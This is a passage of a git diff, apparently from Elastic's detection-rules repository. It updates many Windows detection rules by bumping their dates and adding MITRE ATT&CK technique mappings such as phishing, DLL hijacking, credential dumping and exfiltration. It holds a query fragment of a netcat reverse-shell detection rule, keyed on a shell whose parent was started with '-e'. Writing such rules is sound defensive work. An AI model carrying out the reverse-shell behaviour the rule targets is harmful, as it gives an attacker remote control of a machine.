@@ -90,26 +90,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1189" name = "Drive-by Compromise" reference = "https://attack.mitre.org/techniques/T1189/" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_initial_access_via_msc_file.toml b/rules/windows/execution_initial_access_via_msc_file.toml index b0fc6db6048..1f7219d965d 100644 --- a/rules/windows/execution_initial_access_via_msc_file.toml +++ b/rules/windows/execution_initial_access_via_msc_file.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -100,27 +100,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -131,10 +134,25 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.014" +name = "MMC" +reference = "https://attack.mitre.org/techniques/T1218/014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_initial_access_wps_dll_exploit.toml b/rules/windows/execution_initial_access_wps_dll_exploit.toml index b6d8c918d59..cef5e3fb0f2 100644 --- a/rules/windows/execution_initial_access_wps_dll_exploit.toml +++ b/rules/windows/execution_initial_access_wps_dll_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -88,26 +88,49 @@ any where host.os.type == "windows" and process.name : "promecefpluginhost.exe" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1189" name = "Drive-by Compromise" reference = "https://attack.mitre.org/techniques/T1189/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_ms_office_written_file.toml b/rules/windows/execution_ms_office_written_file.toml index 979a2d927a3..330a2bc739e 100644 --- a/rules/windows/execution_ms_office_written_file.toml +++ b/rules/windows/execution_ms_office_written_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2024/08/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -99,16 +99,34 @@ sequence with maxspan=2h [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -119,10 +137,7 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_nodejs_susp_patterns.toml b/rules/windows/execution_nodejs_susp_patterns.toml index 56fb9fb8bc8..4bdf3d086cd 100644 --- a/rules/windows/execution_nodejs_susp_patterns.toml +++ b/rules/windows/execution_nodejs_susp_patterns.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/21" +updated_date = "2026/03/24" [rule] 
@@ -109,11 +109,25 @@ id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_notepad_markdown_child_process.toml b/rules/windows/execution_notepad_markdown_child_process.toml index c7f3b8f24a8..13e0813ef61 100644 --- a/rules/windows/execution_notepad_markdown_child_process.toml +++ b/rules/windows/execution_notepad_markdown_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/16" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,11 +81,21 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/windows/execution_posh_hacktool_functions.toml b/rules/windows/execution_posh_hacktool_functions.toml index 8e6c5f0f7eb..1c53fa9db0e 100644 
--- a/rules/windows/execution_posh_hacktool_functions.toml
+++ b/rules/windows/execution_posh_hacktool_functions.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/17"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -310,22 +310,166 @@ case_insensitive = true value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.006" +name = "DCSync" +reference = "https://attack.mitre.org/techniques/T1003/006/" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.006" +name = "Group Policy Preferences" +reference = "https://attack.mitre.org/techniques/T1552/006/" + +[[rule.threat.technique]] +id = "T1558" +name = "Steal or Forge Kerberos Tickets" +reference = "https://attack.mitre.org/techniques/T1558/" + +[[rule.threat.technique.subtechnique]] +id = "T1558.003" +name = "Kerberoasting" +reference = "https://attack.mitre.org/techniques/T1558/003/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token 
Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique]] +id = "T1482" +name = "Domain Trust Discovery" +reference = "https://attack.mitre.org/techniques/T1482/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = 
"https://attack.mitre.org/techniques/T1053/005/" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.005" +name = "Security Support Provider" +reference = "https://attack.mitre.org/techniques/T1547/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_posh_portable_executable.toml b/rules/windows/execution_posh_portable_executable.toml index 2053274cec8..d52be5d20cc 100644 --- a/rules/windows/execution_posh_portable_executable.toml +++ b/rules/windows/execution_posh_portable_executable.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -118,34 +118,44 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.013" +name = "Encrypted/Encoded File" +reference = "https://attack.mitre.org/techniques/T1027/013/" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_powershell_susp_args_via_winscript.toml b/rules/windows/execution_powershell_susp_args_via_winscript.toml index f5e2c08a17b..25a637bbd54 100644 --- a/rules/windows/execution_powershell_susp_args_via_winscript.toml +++ b/rules/windows/execution_powershell_susp_args_via_winscript.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/09" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -105,10 +105,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -124,10 +126,30 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_revshell_cmd_via_netcat.toml b/rules/windows/execution_revshell_cmd_via_netcat.toml index 2ca0d6e9e10..3abeef4bedc 100644 --- a/rules/windows/execution_revshell_cmd_via_netcat.toml +++ b/rules/windows/execution_revshell_cmd_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/10/14" +updated_date = "2026/03/24" [rule] @@ -75,10 +75,12 @@ process.name : ("cmd.exe", "powershell.exe") and process.parent.args : "-e" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -89,9 +91,20 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/execution_scheduled_task_powershell_source.toml b/rules/windows/execution_scheduled_task_powershell_source.toml index 67a11ba82f0..83194087722 100644 --- a/rules/windows/execution_scheduled_task_powershell_source.toml +++ b/rules/windows/execution_scheduled_task_powershell_source.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/11/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -82,29 +82,46 @@ sequence by host.id, process.entity_id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_scripting_remote_webdav.toml b/rules/windows/execution_scripting_remote_webdav.toml index bce62a907c5..bc04b569daa 100644 --- a/rules/windows/execution_scripting_remote_webdav.toml +++ b/rules/windows/execution_scripting_remote_webdav.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -80,41 +80,64 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - [[rule.threat.technique]] id = "T1570" name = "Lateral Tool Transfer" reference = "https://attack.mitre.org/techniques/T1570/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/execution_scripts_archive_file.toml b/rules/windows/execution_scripts_archive_file.toml index 8bc7d0e44cc..5243860e944 100644 --- a/rules/windows/execution_scripts_archive_file.toml +++ b/rules/windows/execution_scripts_archive_file.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/24" [rule] @@ -104,20 +104,27 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - diff --git a/rules/windows/execution_shared_modules_local_sxs_dll.toml b/rules/windows/execution_shared_modules_local_sxs_dll.toml index 26b1f2df891..3c92dda7f97 100644 --- a/rules/windows/execution_shared_modules_local_sxs_dll.toml +++ b/rules/windows/execution_shared_modules_local_sxs_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -60,14 +60,31 @@ file where host.os.type == "windows" and file.extension : "dll" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1129" name = "Shared Modules" reference = "https://attack.mitre.org/techniques/T1129/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_susp_javascript_via_deno.toml b/rules/windows/execution_susp_javascript_via_deno.toml index ec8fe357c7a..97d11c50775 100644 --- a/rules/windows/execution_susp_javascript_via_deno.toml +++ b/rules/windows/execution_susp_javascript_via_deno.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/19" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -77,10 +77,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" 
@@ -90,3 +92,29 @@ reference = "https://attack.mitre.org/techniques/T1059/007/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_suspicious_cmd_wmi.toml b/rules/windows/execution_suspicious_cmd_wmi.toml index 9f27f9612ae..997ab764138 100644 --- a/rules/windows/execution_suspicious_cmd_wmi.toml +++ b/rules/windows/execution_suspicious_cmd_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,6 +94,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" 
@@ -103,15 +104,31 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_suspicious_pdf_reader.toml b/rules/windows/execution_suspicious_pdf_reader.toml index c816d82ecd2..8dbb330504c 100644 --- a/rules/windows/execution_suspicious_pdf_reader.toml +++ b/rules/windows/execution_suspicious_pdf_reader.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -113,31 +113,117 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + 
+[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique.subtechnique]] +id = "T1016.001" +name = "Internet Connection Discovery" +reference = "https://attack.mitre.org/techniques/T1016/001/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/windows/execution_suspicious_psexesvc.toml b/rules/windows/execution_suspicious_psexesvc.toml index 